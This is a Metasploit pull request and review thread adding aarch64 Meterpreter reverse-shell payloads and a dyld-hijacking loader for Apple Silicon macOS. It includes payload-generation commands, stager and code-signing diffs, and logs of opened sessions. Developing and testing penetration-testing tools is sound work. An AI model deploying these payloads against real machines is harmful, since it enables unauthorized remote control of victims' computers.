### PR TITLE
M1ssion Dyld Mettle: Aarch64 Payloads

### PR DESCRIPTION
**Pull request by usiegl00**
This builds on Back from the dyld by adding the required aarch64 assembly code to enable the OSX loader to run on the m1. This enables the use of native payloads on M1 or M2 devices that do not have Rosetta installed.

### Verification steps

See #17050

Compile steps:

```
# stager
bash -c "cd external/source/shellcode/osx/stager; make clean install"


# template
bash -c "cd external/source/shellcode/osx/template; make clean install"
```

Modules to test, ensure that you can run `chmod +x ./shell; ./shell` in a separate tab and that a new session opens, as well as the test suite passing:

```
## Load test suite against a session example
loadpath test/modules
use test/all
run session=-1


############### arch

### stageless
jobs -K
sessions -K
use osx/aarch64/meterpreter_reverse_tcp
generate -f macho -o shell lhost=127.0.0.1
to_handler

jobs -K
sessions -K
use osx/aarch64/meterpreter_reverse_http
generate -f macho -o shell lhost=127.0.0.1
to_handler

jobs -K
sessions -K
use osx/aarch64/meterpreter_reverse_https
generate -f macho -o shell lhost=127.0.0.1
to_handler

### staged
jobs -K
sessions -K
use osx/aarch64/meterpreter/reverse_tcp
generate -f macho -o shell lhost=127.0.0.1
to_handler

############### intel

### stageless

jobs -K
sessions -K
use osx/x64/meterpreter_reverse_tcp
generate -f macho -o shell lhost=127.0.0.1
to_handler

### staged
jobs -K
sessions -K
use osx/x64/meterpreter/reverse_tcp
generate -f macho -o shell lhost=127.0.0.1
to_handler
```

### CODE REVIEW

**Comment by timwr** [comment]
Presumably this needs a corresponding pull request to [mettle](https://github.com/rapid7/mettle) to support building aarch64? Nice work btw!

**Comment by space-r7** [comment]
#17050 has been landed, so you should be able to rebase and pull in those changes. This is really great, thanks for adding this!

**Comment by jmartin-r7** [comment]
https://github.com/rapid7/mettle/pull/237 should contain the required mettle artifacts to move this forward.

**Review by space-r7 — COMMENTED** [review]
A couple of small suggestions and noted an issue with the stageless payload.

File: lib/msf/util/exe.rb [hunk 1]
```diff
@@ -166,6 +166,9 @@ def self.to_executable(framework, arch, plat, code = '', opts = {})
       if plat.index(Msf::Module::Platform::Linux)
         return to_linux_aarch64_elf(framework, code)
       end
+      if plat.index(Msf::Module::Platform::OSX)
+        return to_osx_aarch64_macho(framework, code)
```
[the remark this answers is not in the document]
Comment (timwr) [reply lib/msf/util/exe.rb:171]: You could consider moving the signing code to here https://github.com/rapid7/metasploit-framework/blob/master/lib/msf/core/payload/macho.rb
Nice work btw

File: lib/msf/core/payload/macho.rb [hunk 2]
```diff
@@ -53,6 +54,32 @@ def to_dylib(name)
...
+  def sign
+    raw_data = @macho.serialize
+    code_signature_index = @macho[:LC_CODE_SIGNATURE][0].dataoff
+    code_signature = raw_data[code_signature_index..]
+    s_magic, s_length, s_count, code_indexes = code_signature.unpack("N3a*")
+    raise "Invalid Magic!" if s_magic != 0xfade0cc0
+    indexes = code_indexes.unpack("N#{s_count*2}a*")
+    code_directory = indexes.pop
+    magic, length, version, flags, hash_offset, ident_offset, n_special_slots, n_code_slots, code_limit, hash_size, hash_type, platform, page_size, spare2, hash_list = code_directory.unpack("N9C4Na*")
+    raise "Invalid Magic2!" if magic != 0xfade0c02
```
Comment (space-r7) [inline lib/msf/core/payload/macho.rb:66]: Is the first magic number related to the code signature? If so, could these raise messages be changed to something like `Invalid magic number for macho code signature` and `Invalid magic number for macho` or something along those lines to be a little more descriptive?

**Review by space-r7 — COMMENTED** [review]
Just one comment on the new code signature additions. Here's the output from testing the updates:

```
msf6 payload(osx/aarch64/meterpreter/reverse_tcp) >
[*] Transmitting first stager...(328 bytes)
[*] Transmitting second stager...(49152 bytes)
[*] Sending stage (812819 bytes) to 192.168.157.1
[-] Meterpreter session 3 is not valid and will be closed
[*] 192.168.157.1 - Meterpreter session 3 closed.

msf6 payload(osx/aarch64/meterpreter/reverse_tcp) > use payload/osx/aarch64/meterpreter_reverse_tcp
msf6 payload(osx/aarch64/meterpreter_reverse_tcp) > generate -f macho -o /Users/sherbs/Desktop/payload_stageless LHOST=192.168.157.1
[*] Writing 812819 bytes to /Users/sherbs/Desktop/payload_stageless...
msf6 payload(osx/aarch64/meterpreter_reverse_tcp) > jobs -K
Stopping all jobs...
msf6 payload(osx/aarch64/meterpreter_reverse_tcp) > to_handler
[*] Payload Handler Started as Job 1

[*] Started reverse TCP handler on [192.168.157.1:4444](http://192.168.157.1:4444/)
msf6 payload(osx/aarch64/meterpreter_reverse_tcp) > [*] 192.168.157.1 - Meterpreter session 4 closed.  Reason: Died
[*] Meterpreter session 5 opened ([192.168.157.1:4444](http://192.168.157.1:4444/) -> [192.168.157.1:61786](http://192.168.157.1:61786/)) at 2023-03-06 16:52:51 -0600

msf6 payload(osx/aarch64/meterpreter_reverse_tcp) > sessions -i -1
[*] Starting interaction with 5...

meterpreter > getuid
Server username: sherbs
meterpreter > sysinfo
Computer     : nostromo.local
OS           : macOS Ventura (macOS 13.2.0)
Architecture : arm64
BuildTuple   : aarch64-apple-darwin
Meterpreter  : aarch64/osx
meterpreter >
```

The first two attempt is with the staged payload, which appears to send the midstager and stage across, but will report back as closed before establishing a session. The stageless payload achieved a session, which is the last attempt in the output.

msftidy is outputting that `modules/payloads/singles/osx/aarch64/meterpreter_reverse_tcp.rb`, `modules/payloads/singles/osx/aarch64/meterpreter_reverse_https.rb`, and `modules/payloads/singles/osx/aarch64/meterpreter_reverse_http.rb ` have formatting errors in them. You can run `rubocop -a` on those files to fix the issues, and that should get the linter tests to pass.

**Comment by space-r7** [comment]
> @space-r7 Is the staged payload crashing every time on your machine? It's crashing about 1/5 times on mine. I am working on a fix, but it's not pretty. :-P

Yea, it's happened for me every time so far

**Comment by space-r7** [comment]
> @space-r7 Does the most recent commit fix your issue? If not, would you please send me a crash report from Console.app?

Sorry, I should have worded myself better. It's not that the process is actually crashing for the staged payload, just that once the `Sending stage..` message is displayed, Metasploit then outputs that the session is invalid, and then the session is closed. The new changes haven't affected this so far. I'll try to do some debugging to better help with this.

**Comment by space-r7** [comment]
Sorry for the delay! Here's my output from executing a staged payload:

```
sherbs@nostromo -> Desktop ./payload
main!
hello world!
good symbol!
gDyld found, using dual hijack technique.
apis: %lld
config: %i
base: %lld
sdyld: %lld
```

It appears to hang at the `sdyld` line. I'm testing this on Ventura 13.2 with an M1.

**Comment by space-r7** [comment]
Thanks! The payload managed to get much further this time; however, I'm now getting a bus error:

```
sherbs@nostromo -> Desktop ./payload
zsh: bus error  ./payload
sherbs@nostromo -> Desktop ./payload
main!
hello world!
good symbol!
gDyld found, using dual hijack technique.
apis: %lld
config: %i
base: %lld
sdyld: %lld
Ventura!
Errno: %lld
Buffer: %lld
Analyzing Segments.
vmSpace: %lld
Translated: %s
VMAllocate Ret: %lld
LoadAddress: %lld
Region Ptrs: %lld
usedCount: %lld
allocCount: %lld
Region vmOffset: %lld
Region perms: %lld
Region isZeroFill: %lld
Region readOnlyData: %lld
Region fileOffset: %lld
Region fileSize: %lld
----
Region vmOffset: %lld
Region perms: %lld
Region isZeroFill: %lld
Region readOnlyData: %lld
Region fileOffset: %lld
Region fileSize: %lld
----
Errno: %i
Addr: %lld
Size: %lld
Perms: %lld
Flags: %lld
FD: %lld
Offset: %lld
Errno: %i
Buffer: %lld
BufferO: %lld
Errno: %i
SegAddress: %lld
Errno: %i
Region vmOffset: %lld
Region perms: %lld
Region isZeroFill: %lld
Region readOnlyData: %lld
Region fileOffset: %lld
Region fileSize: %lld
----
Errno: %i
Addr: %lld
Size: %lld
Perms: %lld
Flags: %lld
FD: %lld
Offset: %lld
Errno: %i
Buffer: %lld
BufferO: %lld
Errno: %i
SegAddress: %lld
Errno: %i
Region vmOffset: %lld
Region perms: %lld
Region isZeroFill: %lld
Region readOnlyData: %lld
Region fileOffset: %lld
Region fileSize: %lld
----
Errno: %i
Addr: %lld
Size: %lld
Perms: %lld
Flags: %lld
FD: %lld
Offset: %lld
Errno: %i
Buffer: %lld
BufferO: %lld
Errno: %i
SegAddress: %lld
Errno: %i
Region vmOffset: %lld
Region perms: %lld
Region isZeroFill: %lld
Region readOnlyData: %lld
Region fileOffset: %lld
Region fileSize: %lld
----
Region vmOffset: %lld
Region perms: %lld
Region isZeroFill: %lld
Region readOnlyData: %lld
Region fileOffset: %lld
Region fileSize: %lld
----
Errno: %i
Addr: %lld
Size: %lld
Perms: %lld
Flags: %lld
FD: %lld
Offset: %lld
Errno: %i
Buffer: %lld
BufferO: %lld
Errno: %i
SegAddress: %lld
Errno: %i
Loaded Size: %lld
Loaded first: %lld
Loaded Capacity: %lld
Apis: %lld
LoadAddress: %lld
JITLMP: %lld
zsh: bus error  ./payload
```

**Comment by Ishaanahuja7** [comment]
Any update on this? @usiegl00 @space-r7

**Comment by adfoster-r7** [comment]
Looks like this needs a rebase and rubocop run on the files :+1:

**Comment by Ishaanahuja7** [comment]
@space-r7 Please approve and merge

**Comment by adfoster-r7** [comment]
To the tester, it looks like a few other commits are coming along with this which we should quickly verify as working as well, i.e. 1.0.20 to the version on this PR

File: modules/payloads/stagers/osx/aarch64/reverse_tcp.rb [hunk 3]
```diff
@@ -0,0 +1,131 @@
...
+  def generate(_opts = {})
+    encoded_port = [datastore['LPORT'].to_i, 2].pack('vv').unpack('N').first
+    encoded_host = Rex::Socket.addr_aton(datastore['LHOST'] || '127.127.127.127').unpack('V').first
+    retry_count = datastore['StagerRetryCount']
+    seconds = datastore['StagerRetryWait']
+    sleep_seconds = seconds.to_i
+    sleep_nanoseconds = (seconds % 1 * 1000000000).to_i
+
+    payload = [
+      # Generated from external/source/shellcode/osx/aarch64/stager_sock_reverse.s
```
Comment (adfoster-r7) [inline modules/payloads/stagers/osx/aarch64/reverse_tcp.rb:45]: I know this is the existing pattern, but I don't suppose you looked into seeing if Metasm could compile this for us? 

i.e. similar to this pattern (but obviously not MIPs etc)

https://github.com/rapid7/metasploit-framework/blob/88a539a82cd8b48b1185b3b5d80b1857c64f1bc1/modules/encoders/mipsbe/byte_xori.rb#L50

Comment (adfoster-r7) [reply modules/payloads/stagers/osx/aarch64/reverse_tcp.rb:45]: If it works as expected, and is a nicer workflow - then I think that would be a good idea :+1:

Comment (jmartin-r7) [reply modules/payloads/stagers/osx/aarch64/reverse_tcp.rb:45]: Upstream does https://github.com/jjyg/metasm/blob/06adbc4e4a5d77b6820182e498a34f33c0268d34/metasm/cpu/arm64/opcodes.rb

We likely need to do some testing though and update the fork to release a new gem.

Comment (adfoster-r7) [reply modules/payloads/stagers/osx/aarch64/reverse_tcp.rb:45]: Echo'ing the above - looks like the rapid7 fork and the latest metasm code are both on the same commit `0a51957 · 4 years ago History` where the arm64 parser isn't implemented upstream:

https://github.com/jjyg/metasm/blob/06adbc4e4a5d77b6820182e498a34f33c0268d34/metasm/cpu/arm64/parse.rb#L16-L18

So calling the parser explodes:

```
>> Metasm::Shellcode.assemble(Metasm::ARM64.new, "mov x0, #1\n").disassemble.decoded
/path/metasm/cpu/arm64/parse.rb:17:in `parse_argument': at "\"<unk>\"" line 1: fu (Metasm::ParseError)
```

So it looks like metasm support shouldn't be a blocker to this PR, although I imagine we'll need metasm arm support again in the future 😄

File: external/source/shellcode/osx/stager/main.c [hunk 4]
```diff
@@ -341,152 +371,136 @@ int main(int argc, char** argv)
...
-#endif
 
   // gDyld is a special struct that libdyld.dylib uses to interface with dyld4.
   // gDyld is not present in dyld3 and back.
   void* gDyld = find_symbol(dyld, "__ZN5dyld45gDyldE", offset);
   //printf("gDyld: %lld\n", gDyld);
   void * addr_main = 0;
   if (gDyld != 0) {
-#ifdef DEBUG
     print("gDyld found, using dual hijack technique.\n");
```
Comment (adfoster-r7) [inline external/source/shellcode/osx/stager/main.c:382]: It looks like I'm getting a bunch of extra junk characters printed out here when running the compiled version under Rosetta with `osx/x64/meterpreter/reverse_tcp`:

```
% ./x64_shell 
	main!
hello world!
good symbol!
gDyld found, using dual hijack technique.
aϠ'
   pϠ'
      iϠ'
         sϠ'
            :Ϡ'
                Ϡ'
                  4Ϡ'
                     4Ϡ'
                        8Ϡ'
                           0Ϡ'
                              7Ϡ'
                                 7Ϡ'
                                    8Ϡ'
                                       3Ϡ'
                                          3Ϡ'
                                             6Ϡ'

Ϡ'
  cϠ'
     oϠ'
        nϠ'
           fϠ'
              iϠ'
                 gϠ'
                    :Ϡ'
                        Ϡ'
                          8Ϡ'
                             6Ϡ'
                                3Ϡ'
                                   6Ϡ'
                                      9Ϡ'
                                         4Ϡ'
                                            8Ϡ'
                                               4Ϡ'
                                                  9Ϡ'
                                                     6Ϡ'

Ϡ'
  bϠ'
     aϠ'
        sϠ'
           eϠ'
              :Ϡ'
                  Ϡ'
                    8Ϡ'
                       6Ϡ'
                          3Ϡ'
                             5Ϡ'
                                9Ϡ'
                                   0Ϡ'
                                      4Ϡ'
                                         0Ϡ'
                                            0Ϡ'
                                               0Ϡ'

Ϡ'
  sϠ'
     dϠ'
        yϠ'
           lϠ'
              dϠ'
                 :Ϡ'
                     Ϡ'
                       8Ϡ'
                          6Ϡ'
                             3Ϡ'
                                6Ϡ'
                                   5Ϡ'
                                      0Ϡ'
                                         6Ϡ'
                                            1Ϡ'
                                               1Ϡ'
                                                  2Ϡ'

Ϡ'
  EϠ'
     rϠ'
        rϠ'
           nϠ'
              oϠ'
                 :Ϡ'
                     Ϡ'
                       2Ϡ'

Ϡ'
  BϠ'
     uϠ'
        fϠ'
           fϠ'
              eϠ'
                 rϠ'
                    :Ϡ'
                        Ϡ'
                          4Ϡ'
                             4Ϡ'
                                8Ϡ'
                                   2Ϡ'
                                      1Ϡ'
                                         5Ϡ'
                                            8Ϡ'
                                               5Ϡ'
                                                  9Ϡ'
                                                     2Ϡ'

Ϡ'
  Analyzing Segments.
vϠ'
   mϠ'
      SϠ'
         pϠ'
            aϠ'
               cϠ'
                  eϠ'
                     :Ϡ'
                         Ϡ'
                           8Ϡ'
                              6Ϡ'
                                 0Ϡ'
                                    1Ϡ'
                                       6Ϡ'
                                          0Ϡ'

Ϡ'
  Rosetta.
TϠ'
   rϠ'
      aϠ'
         nϠ'
            sϠ'
               lϠ'
                  aϠ'
                     tϠ'
                        eϠ'
                           dϠ'
                              :Ϡ'
                                  Ϡ'
                                    tϠ'
                                       rϠ'
                                          uϠ'
                                             eϠ'

Ϡ'
  VϠ'
     MϠ'
        AϠ'
           lϠ'
              lϠ'
                 oϠ'
                    cϠ'
                       aϠ'
                          tϠ'
                             eϠ'
                                 Ϡ'
                                   RϠ'
                                      eϠ'
                                         tϠ'
                                            :Ϡ'
                                                Ϡ'
                                                  0Ϡ'

...etc...
...etc...
...etc...
...etc...

Has local variables.
Setting up locals.
Setting up locals.
Setting up locals.
Setting up locals.
Has local variables.
Setting up locals.
Has local variables.
Setting up locals.
Setting up locals.
Setting up locals.
Setting up locals.
Setting up locals.
Setting up locals.
Setting up locals.
Setting up locals.
Notifying.
Initializing
H?P?
    a?P?
        n?P?
            d?P?
                l?P?
                    e?P?
                        :?P?
                             ?P?
                                9?P?
                                    0?P?
                                        1?P?
                                            4?P?
                                                3?P?
                                                    8?P?
                                                        7?P?
                                                            7?P?
                                                                7?P?
                                                                    6?P?

?P?
   V?P?
       M?P?
```

File: modules/payloads/stagers/osx/aarch64/reverse_tcp.rb (hunk 3 above)
Comment (adfoster-r7) [reply modules/payloads/stagers/osx/aarch64/reverse_tcp.rb:45]: I'll mark this idea/thread as resolved as it's not a viable approach; I've created an upstream Metasm issue https://github.com/jjyg/metasm/issues/45 to discuss adding aarch64 support - definitely not a blocker 👍

**Review by adfoster-r7 — COMMENTED** [review]
🟢 Stageless `osx/aarch64/meterpreter_reverse_tcp` works:

```
msf6 payload(osx/aarch64/meterpreter_reverse_tcp) > 
[*] Transmitting first stager...(328 bytes)
[*] Transmitting second stager...(65536 bytes)
[*] Sending stage (812819 bytes) to 127.0.0.1
[*] Meterpreter session 8 opened (127.0.0.1:4444 -> 127.0.0.1:49167) at 2023-07-31 16:19:23 -0500

msf6 payload(osx/aarch64/meterpreter_reverse_tcp) > sessions -i -1 -C getuid
[*] Running 'getuid' on meterpreter session 8 (127.0.0.1)
Server username: jenkins
```

🔴 Hitting issues with the `osx/aarch64/meterpreter/reverse_tcp` payload

```
msf6 payload(osx/aarch64/meterpreter_reverse_tcp) > setg sessiontlvlogging true
sessiontlvlogging => true
msf6 payload(osx/aarch64/meterpreter/reverse_tcp) >
[*] Transmitting first stager...(328 bytes)
[*] Transmitting second stager...(49152 bytes)
[*] Sending stage (812819 bytes) to 127.0.0.1

SEND: #<Rex::Post::Meterpreter::Packet type=Request         tlvs=[
  #<Rex::Post::Meterpreter::Tlv type=COMMAND_ID      meta=INT        value=16 command=core_negotiate_tlv_encryption>
  #<Rex::Post::Meterpreter::Tlv type=REQUEST_ID      meta=STRING     value="15140495648546938480501506891891">
  #<Rex::Post::Meterpreter::Tlv type=RSA_PUB_KEY     meta=RAW        value="0\x82\x01\"0\r\x06\t*\x86H\x86\xF7\r\x01\x01\x01\ ...">
]>

msf6 payload(osx/aarch64/meterpreter/reverse_tcp) >
[-] Meterpreter session 4 is not valid and will be closed
[*] 127.0.0.1 - Meterpreter session 4 closed.
```

Stager output:

```
% ./shell
zsh: segmentation fault  ./shell
```

Steps leading up to the failure
```
(lldb) 
Process 1895 stopped
* thread #1, queue = 'com.apple.main-thread', stop reason = instruction step over
    frame #0: 0x000000010020c0ec
->  0x10020c0ec: add    x0, x0, #0x20, lsl #12    ; =0x20000 
    0x10020c0f0: mov    sp, x0
    0x10020c0f4: mov    x0, x13
    0x10020c0f8: blr    x15
Target 0: (shell) stopped.
(lldb) 
Process 1895 stopped
* thread #1, queue = 'com.apple.main-thread', stop reason = instruction step over
    frame #0: 0x000000010020c0f0
->  0x10020c0f0: mov    sp, x0
    0x10020c0f4: mov    x0, x13
    0x10020c0f8: blr    x15
    0x10020c0fc: mov    x0, #0x0
Target 0: (shell) stopped.
(lldb) 
Process 1895 stopped
* thread #1, queue = 'com.apple.main-thread', stop reason = instruction step over
    frame #0: 0x000000010020c0f4
->  0x10020c0f4: mov    x0, x13
    0x10020c0f8: blr    x15
    0x10020c0fc: mov    x0, #0x0
    0x10020c100: ldr    x16, #0x40
Target 0: (shell) stopped.
(lldb) 
Process 1895 stopped
* thread #1, queue = 'com.apple.main-thread', stop reason = instruction step over
    frame #0: 0x000000010020c0f8
->  0x10020c0f8: blr    x15
    0x10020c0fc: mov    x0, #0x0
    0x10020c100: ldr    x16, #0x40
    0x10020c104: svc    #0
Target 0: (shell) stopped.
(lldb) reg read
General Purpose Registers:
        x0 = 0x0000000000000003
        x1 = 0x0000000000000000
        x2 = 0x0000000000000003
        x3 = 0x0000000000001002
        x4 = 0x0000000000000000
        x5 = 0x0000000000000000
        x6 = 0x0000000000000000
        x7 = 0x0000000000000000
        x8 = 0x0000000100208000
        x9 = 0x0000000000000002
       x10 = 0x00000000000c6713
       x11 = 0x0000000100220000
       x12 = 0x0000000100220000
       x13 = 0x0000000000000003
       x14 = 0x0000000000001f40
       x15 = 0x0000000100211dd4
       x16 = 0x00000000020000c5
       x17 = 0x00000001fbc91e40  (void *)0x00000001a1b8b0d0: _platform_memmove
       x18 = 0x0000000000000000
       x19 = 0x00000001000c4060
       x20 = 0x0000000100003ef8  shell`main
       x21 = 0x0000000100070070  dyld`dyld4::sConfigBuffer
       x22 = 0x0000000000000000
       x23 = 0x0000000000000000
       x24 = 0x0000000000000000
       x25 = 0x0000000000000000
       x26 = 0x0000000000000000
       x27 = 0x0000000000000000
       x28 = 0x0000000000000000
        fp = 0x000000016fdff1b0
        lr = 0x0000000100003f7c  shell`main + 132
        sp = 0x0000000100420000
        pc = 0x000000010020c0f8
      cpsr = 0x00001000

(lldb) step
Process 1895 stopped
* thread #1, queue = 'com.apple.main-thread', stop reason = instruction step into
    frame #0: 0x0000000100211dd4
->  0x100211dd4: ldr    x2, [x9, #0x280]
    0x100211dd8: add    x3, sp, #0x1c8
    0x100211ddc: mov    w9, #0x1
    0x100211de0: and    w4, w9, #0x1
Target 0: (shell) stopped.
(lldb) next
Process 1895 stopped
* thread #1, queue = 'com.apple.main-thread', stop reason = EXC_BAD_ACCESS (code=1, address=0x282)
    frame #0: 0x0000000100211dd4
->  0x100211dd4: ldr    x2, [x9, #0x280]
    0x100211dd8: add    x3, sp, #0x1c8
    0x100211ddc: mov    w9, #0x1
    0x100211de0: and    w4, w9, #0x1
Target 0: (shell) stopped.
```

I believe it's dying on the call to osx main in x15; I'm testing on an M1 machine running in UTM with Montery 12.6. Unfortunately I'm running with a  slightly janky setup currently which makes it awkward to debug further - if there's not enough details to fix the crash - I'll try to get access to a different setup/get more details :+1:

**Comment by adfoster-r7** [comment]
@usiegl00 Thanks! I've ran this through on 11.7.8 on AWS, and 12.6 on M1 in UTM. I've sent a PR for updating the Makefile for the template setup and compiling the binaries. I'll do a final pass on 13.x tomorrow

**Comment by adfoster-r7** [comment]
Finished testing with Ventura 13.4.1 on AWS now too, all looks good to me! 🥳

**Comment by adfoster-r7** [comment]
Thanks for the awesome work @usiegl00 🎉

**Pull request merged**